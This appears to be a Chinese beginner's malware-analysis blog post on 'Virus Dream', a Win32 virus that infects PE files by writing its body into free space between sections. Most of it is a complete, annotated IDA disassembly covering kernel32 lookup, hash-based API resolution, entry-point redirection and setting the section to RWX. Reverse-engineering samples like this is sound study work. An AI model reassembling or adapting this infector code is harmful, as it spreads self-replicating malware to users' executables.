菜鸟的病毒分析6搜寻节空间感染pe

win32 搜寻节间隙感染pe文件
经过上次那个变形pe头病毒的洗礼,分析这个终于不那么蛋疼了
病毒行为:感染当前目录下的test.exe文件 在原程序运行前运行病毒代码 弹出被感染对话框 继续感染其他文件
流程:搜索api 打开文件 内存映射 搜索每一个节 查看节剩余空间能否插入病毒 如果能 更改相关属性 添加病毒 写文件 关闭文件 完成
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5 : 9EB617432AAA47BAFA7437B8C58ABB25
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : C:\27405\Virus_Dream\Virus_Dream.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00000292 ( 658.)
.text:00401000 ; Section size in file : 00000400 ( 1024.)
.text:00401000 ; Offset to raw data for section: 00000200
.text:00401000 ; Flags E0000020: Text Executable Readable Writable
.text:00401000 ; Alignment : default
.text:00401000
.text:00401000 .686p
.text:00401000 .mmx
.text:00401000 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Write/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00401000
.text:00401000 public start
.text:00401000 start:
.text:00401000 pusha ; save the host's registers; the matching popa runs just before control is handed back
.text:00401001 call sub_401091 ; the pushed return address (0x401006 here) is popped into ebp by sub_401091 and used as the base for all data/API references
.text:00401006
.text:00401006 loc_401006: ; DATA XREF: sub_401091+24o
.text:00401006 jp short near ptr gloaballoc ; NOT code: IDA mis-decoded the first {hash, slot} pair of the API table that really starts at 0x401006 (sub_401238 scans the table from ebp; [ebp+4] = 0x40100A is the CreateFileA slot)
.text:00401008 mov byte ptr [eax], 0 ; likewise data (rest of the first pair)
.text:00401008 ; ---------------------------------------------------------------------------
;;;;; API resolution table: {4-byte name hash, 4-byte address slot} pairs that sub_401238 fills in
;;;;; at run time (hash = rol edx,3 / xor dl,byte over the export name; the list ends at the zero
;;;;; hash at 0x401056). The code reaches the slots relative to ebp = 0x401006:
;;;;;   [ebp+4]   CreateFileA      [ebp+0Ch] GetFileSize    [ebp+14h] ReadFile
;;;;;   [ebp+1Ch] SetFilePointer   [ebp+24h] CloseHandle    [ebp+2Ch] GlobalAlloc
;;;;;   [ebp+34h] GlobalFree       [ebp+3Ch] WriteFile      [ebp+44h] LoadLibraryA
;;;;;   [ebp+4Ch] MessageBoxA (resolved from user32 on the second sub_401238 call)
;;;;; Names follow from the argument counts/values at each call site; e.g. the hash bytes at
;;;;; 0x40100E (E7 EF 54 95 = 0x9554EFE7) are exactly rol3/xor("GetFileSize").
;;;;; NOTE(review): the author's labels sit one byte past the real 4-byte slots (CreateFileA's slot
;;;;; is 0x40100A-0x40100D, not 0x40100B), and IDA decoded the first pair (hash at 0x401006) as the
;;;;; bogus jp/mov instructions above. The hash constants and the 'Virus Dream' strings below are
;;;;; the obvious static indicators for this sample.
.text:0040100B creatfile dw 0 ; tail of slot [ebp+4] (CreateFileA)
.text:0040100D db 0
.text:0040100E db 0E7h ; ? ; hash -> slot [ebp+0Ch] (GetFileSize)
.text:0040100F db 0EFh ; ?
.text:00401010 db 54h ; T
.text:00401011 db 95h ; ?
.text:00401012 getfilesize db 0 ; slot [ebp+0Ch]
.text:00401013 db 0
.text:00401014 db 0
.text:00401015 db 0
.text:00401016 db 45h ; E ; hash -> slot [ebp+14h] (ReadFile)
.text:00401017 db 55h ; U
.text:00401018 db 0E2h ; ?
.text:00401019 db 0Bh
.text:0040101A readfile db 0 ; slot [ebp+14h]
.text:0040101B db 0
.text:0040101C db 0
.text:0040101D db 0
.text:0040101E db 70h ; p ; hash -> slot [ebp+1Ch] (SetFilePointer)
.text:0040101F db 0FDh ; ?
.text:00401020 db 0D1h ; ?
.text:00401021 db 0A9h ; ?
.text:00401022 setfilepointer db 0 ; slot [ebp+1Ch]
.text:00401023 db 0
.text:00401024 db 0
.text:00401025 db 0
.text:00401026 db 16h ; hash -> slot [ebp+24h] (CloseHandle; left unlabeled by the author)
.text:00401027 db 0D6h ; ?
.text:00401028 db 0D6h ; ?
.text:00401029 db 0C0h ; ?
.text:0040102A db 0 ; slot [ebp+24h]
.text:0040102B db 0
.text:0040102C db 0
.text:0040102D db 0
.text:0040102E db 9 ; hash -> slot [ebp+2Ch] (GlobalAlloc)
.text:0040102F db 0D0h ; ?
.text:00401030 db 0F6h, 0C2h
.text:00401032 gloaballoc dw 0 ; CODE XREF: .text:loc_401006j ; slot [ebp+2Ch]; the xref is an artefact of the mis-decoded table start
.text:00401034 db 0
.text:00401035 db 0
.text:00401036 db 0CFh ; ? ; hash -> slot [ebp+34h] (GlobalFree)
.text:00401037 db 0D3h ; ?
.text:00401038 db 5Eh ; ^
.text:00401039 db 58h ; X
.text:0040103A gloabafree db 0 ; slot [ebp+34h]
.text:0040103B db 0
.text:0040103C db 0
.text:0040103D db 0
.text:0040103E db 45h ; E ; hash -> slot [ebp+3Ch] (WriteFile)
.text:0040103F db 0C5h ; ?
.text:00401040 db 0D8h ; ?
.text:00401041 db 58h ; X
.text:00401042 writefile db 0 ; slot [ebp+3Ch]
.text:00401043 db 0
.text:00401044 db 0
.text:00401045 db 0
.text:00401046 db 89h ; ? ; hash -> slot [ebp+44h] (LoadLibraryA)
.text:00401047 db 0FDh ; ?
.text:00401048 db 12h
.text:00401049 db 0A4h ; ?
.text:0040104A loadlibraryA db 0 ; slot [ebp+44h]
.text:0040104B db 0
.text:0040104C db 0
.text:0040104D db 0
.text:0040104E db 51h ; Q ; hash -> slot [ebp+4Ch] (MessageBoxA, matched against user32's export table)
.text:0040104F db 4Ch ; L
.text:00401050 db 0D1h ; ?
.text:00401051 db 14h
.text:00401052 messageboxa db 0 ; slot [ebp+4Ch]
.text:00401053 db 0
.text:00401054 db 0
.text:00401055 db 0
.text:00401056 db 0 ; zero hash: terminates the table for sub_401238
.text:00401057 db 0
.text:00401058 db 0
.text:00401059 align 2
.text:0040105A aVirusDreamDemo db 'Virus Dream - Demo',0 ; [ebp+54h]: MessageBoxA caption
.text:0040106D aOhYeahOfVirusD db 'Oh Yeah of Virus Dream',0 ; [ebp+67h]: MessageBoxA text
.text:00401084 aTest_exe db 'test.exe',0 ; [ebp+7Eh]: the only infection target (current directory)
.text:0040108D align 10h ; 0x40108D = [ebp+87h]: 4 scratch bytes that hold the ReadFile byte count
.text:00401090 db 0
.text:00401091
.text:00401091 ; =============== S U B R O U T I N E =======================================
.text:00401091
.text:00401091 ;;;;;;主体部分;;;;;;;;
.text:00401091 sub_401091 proc near ; CODE XREF: .text:00401001p
.text:00401091
.text:00401091 ; FUNCTION CHUNK AT .text:004011CB SIZE 00000006 BYTES
.text:00401091
.text:00401091 pop ebp
.text:00401092 call sub_40121F ; 查找kernel基址
.text:00401097 push ebp
.text:00401098 push eax
.text:00401099 call sub_401238 ; 查找api
.text:0040109E push 3233h
.text:004010A3 push 72657375h
.text:004010A8 push esp
.text:004010A9 call dword ptr [ebp+44h] ; loalibraryA
.text:004010AC pop edx
.text:004010AD pop edx
.text:004010AE push ebp
.text:004010AF push eax
.text:004010B0 call sub_401238 ; 获取user32中的api
.text:004010B5 cmp ebp, offset loc_401006
.text:004010BB jz short loc_4010DB ; 跳转到病毒感染部分
.text:004010BD push 0
.text:004010BF lea edx, [ebp+54h]
.text:004010C2 push edx
.text:004010C3 lea edx, [ebp+67h]
.text:004010C6 push edx
.text:004010C7 push 0
.text:004010C9 call dword ptr [ebp+4Ch] ; messagebox这里是病毒的发作体现
.text:004010CC lea eax, [ebp+7Eh]
.text:004010CF push eax
.text:004010D0 call sub_4010E6
.text:004010D5 popa
.text:004010D6 jmp baseimage
.text:004010DB ; ---------------------------------------------------------------------------
.text:004010DB ;;;;病毒感染部分;;;;;;;;
.text:004010DB loc_4010DB: ; CODE XREF: sub_401091+2Aj
.text:004010DB lea eax, [ebp+7Eh]
.text:004010DE push eax ; text.ext入栈
.text:004010DF call sub_4010E6
.text:004010E4 popa
.text:004010E5 retn
.text:004010E5 sub_401091 endp ; sp-analysis failed
.text:004010E5
.text:004010E6
.text:004010E6 ; =============== S U B R O U T I N E =======================================
.text:004010E6
.text:004010E6
.text:004010E6 sub_4010E6 proc near ; CODE XREF: sub_401091+3Fp
.text:004010E6 ; sub_401091+4Ep
; Wrapper around the infector. Saves all registers, hands sub_4010F9 the address of the 8-byte
; SEH record it builds just below esp, and doubles as that record's exception handler: the
; "return address" 0x4010F0 pushed by the call becomes the record's handler field.
; Argument: [esp+4] = pointer to the file name. Every exit goes through loc_4011C1 (retn 4).
.text:004010E6
.text:004010E6 var_28 = byte ptr -28h
.text:004010E6 var_14 = dword ptr -14h
.text:004010E6
.text:004010E6 pusha ; undone by the popa at 0x4011C7
.text:004010E7 lea edx, [esp+20h+var_28] ; edx = esp-8: where sub_4010F9 places {previous handler, handler}
.text:004010EB call sub_4010F9 ; does not return here on the normal path: sub_4010F9 pops this return address itself
.text:004010F0 mov esp, [esp+1Ch+var_14] ; handler entry: [esp+8] is the EstablisherFrame argument -> rewind esp to the SEH record
.text:004010F4 jmp loc_4011C1 ; then take the common exit (unlink handler, popa, retn 4); any fault in the infector is silently swallowed
.text:004010F4 sub_4010E6 endp
.text:004010F4
.text:004010F9
.text:004010F9 ; =============== S U B R O U T I N E =======================================
.text:004010F9 ;;;;;病毒注入部分;;;;;;;;
.text:004010F9
.text:004010F9 sub_4010F9 proc near ; CODE XREF: sub_4010E6+5p
.text:004010F9
.text:004010F9 var_34 = dword ptr -34h
.text:004010F9 arg_24 = dword ptr 28h
.text:004010F9
.text:004010F9 sub eax, eax
.text:004010FB xchg edx, fs:[eax]
.text:004010FE push edx
.text:004010FF mov edx, [esp+4+arg_24]
.text:00401103 push eax
.text:00401104 push eax
.text:00401105 push 3
.text:00401107 push eax
.text:00401108 push 2
.text:0040110A push 0C0000000h
.text:0040110F push edx
.text:00401110 call dword ptr [ebp+4] ; 打开文件creatfile
.text:00401113 cmp eax, 0FFFFFFFFh
.text:00401116 jz loc_4011C1
.text:0040111C xchg eax, ebx ; ebx文件局柄
.text:0040111D push 0
.text:0040111F push ebx
.text:00401120 call dword ptr [ebp+0Ch] ; 获取文件大小
.text:00401123 push eax
.text:00401124 push eax
.text:00401125 push 40h
.text:00401127 call dword ptr [ebp+2Ch] ; 开辟内存
.text:0040112A xchg eax, edi
.text:0040112B push 0
.text:0040112D push esp
.text:0040112E push [esp+3Ch+var_34]
.text:00401132 push edi
.text:00401133 push ebx
.text:00401134 call dword ptr [ebp+14h] ; 读文件
.text:00401137 pop dword ptr [ebp+87h]
.text:0040113D push edi
.text:0040113E call checkifpe
.text:00401143 jnb short loc_4011B9
.text:00401145 push edi
.text:00401146 call sub_4011EE ; getsectiontable
.text:0040114B xchg eax, esi ; esi sectiontable
.text:0040114C push edi
.text:0040114D call sub_401211 ; 返回节的个数到ecx
.text:00401152 jecxz short loc_4011B9
.text:00401154
.text:00401154 checkifenoughforvirus: ; CODE XREF: sub_4010F9+6Cj;判断节剩余空间能否写入病毒
.text:00401154 mov edx, [esi+10h]
.text:00401157 sub edx, [esi+8]
.text:0040115A cmp edx, 292h
.text:00401160 jg short loc_401169
.text:00401162 add esi, 28h ; 40字节 这是在循环查找节
.text:00401165 loop checkifenoughforvirus
.text:00401167 jmp short loc_4011B9
.text:00401169 ; ---------------------------------------------------------------------------
.text:00401169
.text:00401169 loc_401169: ; CODE XREF: sub_4010F9+67j
.text:00401169 push edi
.text:0040116A call sub_401200 ; 返回基址到ecx
.text:0040116F mov [ebp+1C6h], eax
.text:00401175 mov edx, [esi+8]
.text:00401178 add edx, [esi+0Ch]
.text:0040117B mov eax, edi
.text:0040117D add eax, [edi+3Ch]
.text:00401180 mov [eax+28h], edx ; 修改入口地址
.text:00401183 or dword ptr [esi+24h], 0E0000020h ; 修改节属性为可读可写可执行
.text:0040118A mov edx, [esi+8]
.text:0040118D add edx, [esi+14h]
.text:00401190 add edx, edi
.text:00401192 pusha
.text:00401193 lea esi, [ebp-6]
.text:00401196 mov ecx, 292h
.text:0040119B mov edi, edx
.text:0040119D cld
.text:0040119E rep movsb ; 写入病毒这里是先写入内存可能后面会写入文件
.text:004011A0 popa
.text:004011A1 push 0
.text:004011A3 push 0
.text:004011A5 push 0
.text:004011A7 push ebx
.text:004011A8 call dword ptr [ebp+1Ch] ; 移动指针到文件头
.text:004011AB push 0
.text:004011AD push esp
.text:004011AE push dword ptr [ebp+87h]
.text:004011B4 push edi
.text:004011B5 push ebx
.text:004011B6 call dword ptr [ebp+3Ch] ; 写文件
.text:004011B9
.text:004011B9 loc_4011B9: ; CODE XREF: sub_4010F9+4Aj
.text:004011B9 ; sub_4010F9+59j ...
.text:004011B9 push ebx
.text:004011BA call dword ptr [ebp+24h] ; 关闭句柄
.text:004011BD push edi
.text:004011BE call dword ptr [ebp+34h] ; 释放内存
.text:004011C1
.text:004011C1 loc_4011C1: ; CODE XREF: sub_4010E6+Ej获取文件句柄
.text:004011C1 ; sub_4010F9+1Dj
.text:004011C1 sub eax, eax
.text:004011C3 pop dword ptr fs:[eax]
.text:004011C6 pop edx
.text:004011C7 popa
.text:004011C8 retn 4 ;;;;感染完成啦
.text:004011C8 sub_4010F9 endp ; sp-analysis failed
.text:004011C8
.text:004011CB ; ---------------------------------------------------------------------------
.text:004011CB ; START OF FUNCTION CHUNK FOR sub_401091
.text:004011CB
.text:004011CB baseimage: ; CODE XREF: sub_401091+45j
.text:004011CB ; sub_401091+13Fj
.text:004011CB ; DATA XREF: ...
; Host hand-off: 'push imm32 / retn'. In this sample the immediate is baseimage itself, but
; sub_4010F9 overwrites the dword at 0x4011CC ([ebp+1C6h]) with the victim's ImageBase +
; AddressOfEntryPoint before copying the body, so each infected copy jumps to its host's OEP.
; NOTE(review): that write targets the *running* copy, so a successful infection performed from
; inside a host would leave this jumping to the new victim's OEP rather than the current host's.
.text:004011CB push offset baseimage ; imm32 lives at 0x4011CC = [ebp+1C6h]
.text:004011D0 retn ; "jump" to the pushed address
.text:004011D0 ; END OF FUNCTION CHUNK FOR sub_401091
.text:004011D1
.text:004011D1 ; =============== S U B R O U T I N E =======================================
.text:004011D1
.text:004011D1
.text:004011D1 checkifpe proc near ; CODE XREF: sub_4010F9+45p ; is the buffer a PE file?
; In:  [esp+4] = pointer to the file image.
; Out: CF=1 if 'MZ' is at offset 0 and 'PE' at e_lfanew, else CF=0. Clobbers edx.
; No size checks: a truncated file or a wild e_lfanew reads out of bounds, which the SEH frame
; installed in sub_4010F9 turns into a silent abort.
.text:004011D1
.text:004011D1 arg_0 = dword ptr 4
.text:004011D1
.text:004011D1 mov edx, [esp+arg_0]
.text:004011D5 cmp word ptr [edx], 'ZM' ; IMAGE_DOS_SIGNATURE ("MZ" read as a little-endian word)
.text:004011DA jnz short loc_4011EA
.text:004011DC add edx, [edx+3Ch] ; edx += e_lfanew
.text:004011DF cmp word ptr [edx], 'EP' ; low word of IMAGE_NT_SIGNATURE ("PE\0\0")
.text:004011E4 jnz short loc_4011EA
.text:004011E6 stc ; PE: CF=1
.text:004011E7 retn 4
.text:004011EA ; ---------------------------------------------------------------------------
.text:004011EA
.text:004011EA loc_4011EA: ; CODE XREF: checkifpe+9j
.text:004011EA ; checkifpe+13j
.text:004011EA clc ; not PE: CF=0
.text:004011EB retn 4
.text:004011EB checkifpe endp
.text:004011EB
.text:004011EE
.text:004011EE ; =============== S U B R O U T I N E =======================================
.text:004011EE;;;;; returns the address of the section table (NT headers + 0x18 + SizeOfOptionalHeader)
.text:004011EE
.text:004011EE sub_4011EE proc near ; CODE XREF: sub_4010F9+4Dp;
; In: [esp+4] = file image. Out: eax = &first IMAGE_SECTION_HEADER. Clobbers edx.
.text:004011EE
.text:004011EE arg_0 = dword ptr 4
.text:004011EE
.text:004011EE mov eax, [esp+arg_0]
.text:004011F2 add eax, [eax+3Ch] ; eax = IMAGE_NT_HEADERS (e_lfanew)
.text:004011F5 movzx edx, word ptr [eax+14h] ; edx = FileHeader.SizeOfOptionalHeader
.text:004011F9 lea eax, [eax+edx+18h] ; + Signature (4) + FileHeader (20) + optional header = section table
.text:004011FD retn 4
.text:004011FD sub_4011EE endp
.text:004011FD
.text:00401200
.text:00401200 ; =============== S U B R O U T I N E =======================================
.text:00401200
.text:00401200
.text:00401200 sub_401200 proc near ; CODE XREF: sub_4010F9+71p
; In:  [esp+4] = file image.
; Out: eax = OptionalHeader.ImageBase + AddressOfEntryPoint, i.e. the victim's original entry
;      point as a virtual address. Clobbers edx. (The original comment said the result goes to
;      ecx; ecx is untouched, the value is returned in eax.)
.text:00401200
.text:00401200 arg_0 = dword ptr 4
.text:00401200
.text:00401200 mov eax, [esp+arg_0]
.text:00401204 add eax, [eax+3Ch] ; eax = IMAGE_NT_HEADERS
.text:00401207 mov edx, [eax+28h] ; OptionalHeader.AddressOfEntryPoint
.text:0040120A add edx, [eax+34h] ; + OptionalHeader.ImageBase
.text:0040120D xchg eax, edx ; return it in eax
.text:0040120E retn 4
.text:0040120E sub_401200 endp
.text:0040120E
.text:00401211
.text:00401211 ; =============== S U B R O U T I N E =======================================
.text:00401211
.text:00401211
.text:00401211 sub_401211 proc near ; CODE XREF: sub_4010F9+54p ; returns the section count
; In: [esp+4] = file image. Out: ecx = FileHeader.NumberOfSections (zero-extended). Clobbers eax.
.text:00401211
.text:00401211 arg_0 = dword ptr 4
.text:00401211
.text:00401211 mov eax, [esp+arg_0]
.text:00401215 add eax, [eax+3Ch] ; eax = IMAGE_NT_HEADERS
.text:00401218 movzx ecx, word ptr [eax+6] ; FileHeader.NumberOfSections (after Signature + Machine)
.text:0040121C retn 4
.text:0040121C sub_401211 endp
.text:0040121C
.text:0040121F
.text:0040121F ; =============== S U B R O U T I N E =======================================
.text:0040121F
.text:0040121F
.text:0040121F sub_40121F proc near ; CODE XREF: sub_401091+1p
; Locates the kernel32 image base without any import: reads the dword 0x1C below the thread's
; StackBase (TEB+4; presumably a kernel32 return address left there by the thread start-up code),
; then walks downward in 64 KiB steps until a page starting with 'MZ' is found.
; Out: eax = module base. Preserves esi.
; NOTE(review): relies on an undocumented stack layout, and the scan is unbounded: no SEH is
; installed yet, so hitting an unmapped page below the start would fault instead of failing cleanly.
.text:0040121F push esi
.text:00401220 xor esi, esi
.text:00401222 mov esi, fs:[esi+18h] ; esi = TEB (NT_TIB.Self)
.text:00401226 lodsd ; eax = [TEB+0] (ExceptionList), esi = TEB+4
.text:00401227 lodsd ; eax = [TEB+4] (StackBase), esi = TEB+8
.text:00401228 mov eax, [eax-1Ch] ; dword just under the top of the stack
.text:0040122B
.text:0040122B loc_40122B: ; CODE XREF: sub_40121F+15j
.text:0040122B dec eax ; step into the previous 64 KiB block ...
.text:0040122C xor ax, ax ; ... and round down to its start (module bases are 64 KiB aligned)
.text:0040122F cmp word ptr [eax], 5A4Dh ; 'MZ'?
.text:00401234 jnz short loc_40122B
.text:00401236 pop esi
.text:00401237 retn
.text:00401237 sub_40121F endp
.text:00401237
.text:00401238
.text:00401238 ; =============== S U B R O U T I N E =======================================
.text:00401238
.text:00401238
.text:00401238 sub_401238 proc near ; CODE XREF: sub_401091+8p ; API resolver by export-name hash
.text:00401238 ; sub_401091+1Fp
; In:  arg_0 = module base, arg_4 = table of {hash, slot} dword pairs terminated by a zero hash.
; For every exported name of the module it computes h = 0; for each byte: h = rol(h,3); h ^= byte,
; and whenever h equals a table hash it stores that export's address into the pair's slot.
; Out: the table is updated in place; all registers preserved (pusha/popa); stdcall, retn 8.
; Only named exports are considered, and a later name with the same hash overwrites the slot.
.text:00401238
.text:00401238 var_24 = dword ptr -24h
.text:00401238 arg_0 = dword ptr 4
.text:00401238 arg_4 = dword ptr 8
.text:00401238
.text:00401238 pusha
.text:00401239 mov ebx, [esp+20h+arg_0] ; ebx = module base
.text:0040123D mov edx, [ebx+3Ch] ; e_lfanew
.text:00401240 mov esi, [ebx+edx+78h] ; DataDirectory[EXPORT].VirtualAddress
.text:00401244 lea esi, [esi+ebx+18h] ; -> IMAGE_EXPORT_DIRECTORY.NumberOfNames
.text:00401248 lodsd
.text:00401249 xchg eax, ecx ; ecx = NumberOfNames (outer loop count)
.text:0040124A lodsd
.text:0040124B add eax, ebx
.text:0040124D xchg eax, ebp ; ebp = AddressOfFunctions (VA); the delta pointer in ebp comes back with popa
.text:0040124E lodsd
.text:0040124F add eax, ebx
.text:00401251 xchg eax, edx ; edx = AddressOfNames (VA)
.text:00401252 lodsd
.text:00401253 add eax, ebx
.text:00401255 push eax ; [esp] = AddressOfNameOrdinals cursor (var_24), advanced 2 bytes per name
.text:00401256 mov esi, edx ; esi walks AddressOfNames
.text:00401258
.text:00401258 loc_401258: ; CODE XREF: sub_401238:loc_40128Bj ; per exported name
.text:00401258 lodsd
.text:00401259 add eax, ebx ; eax = &name string
.text:0040125B xor edx, edx ; edx = running hash
.text:0040125D
.text:0040125D loc_40125D: ; CODE XREF: sub_401238+2Ej
.text:0040125D rol edx, 3
.text:00401260 xor dl, [eax]
.text:00401262 inc eax
.text:00401263 cmp byte ptr [eax], 0 ; until the terminating NUL
.text:00401266 jnz short loc_40125D
.text:00401268 mov eax, [esp+24h+var_24] ; eax = &ordinal of this name
.text:0040126B add [esp+24h+var_24], 2 ; advance the ordinal cursor
.text:0040126F mov edi, [esp+24h+arg_4] ; edi = start of the hash/slot table
.text:00401273
.text:00401273 loc_401273: ; CODE XREF: sub_401238+51j ; scan the table for this hash
.text:00401273 cmp [edi], edx
.text:00401275 jnz short loc_401284
.text:00401277 movzx eax, word ptr [eax] ; ordinal
.text:0040127A mov eax, [ebp+eax*4+0] ; AddressOfFunctions[ordinal] (RVA)
.text:0040127E add eax, ebx ; -> VA
.text:00401280 scasd ; edi += 4: step over the hash dword (DF assumed clear)
.text:00401281 stosd ; slot = resolved address
.text:00401282 jmp short loc_40128B ; next name
.text:00401284 ; ---------------------------------------------------------------------------
.text:00401284
.text:00401284 loc_401284: ; CODE XREF: sub_401238+3Dj
.text:00401284 scasd ; skip hash
.text:00401285 scasd ; skip slot
.text:00401286 cmp dword ptr [edi], 0 ; zero hash = end of table
.text:00401289 jnz short loc_401273
.text:0040128B
.text:0040128B loc_40128B: ; CODE XREF: sub_401238+4Aj
.text:0040128B loop loc_401258
.text:0040128D pop ecx ; drop the ordinal cursor
.text:0040128E popa
.text:0040128F retn 8
.text:0040128F sub_401238 endp
.text:0040128F
.text:0040128F ; ---------------------------------------------------------------------------
.text:00401292 align 200h
.text:00401292 _text ends
.text:00401292
.text:00401292
.text:00401292 end start

 
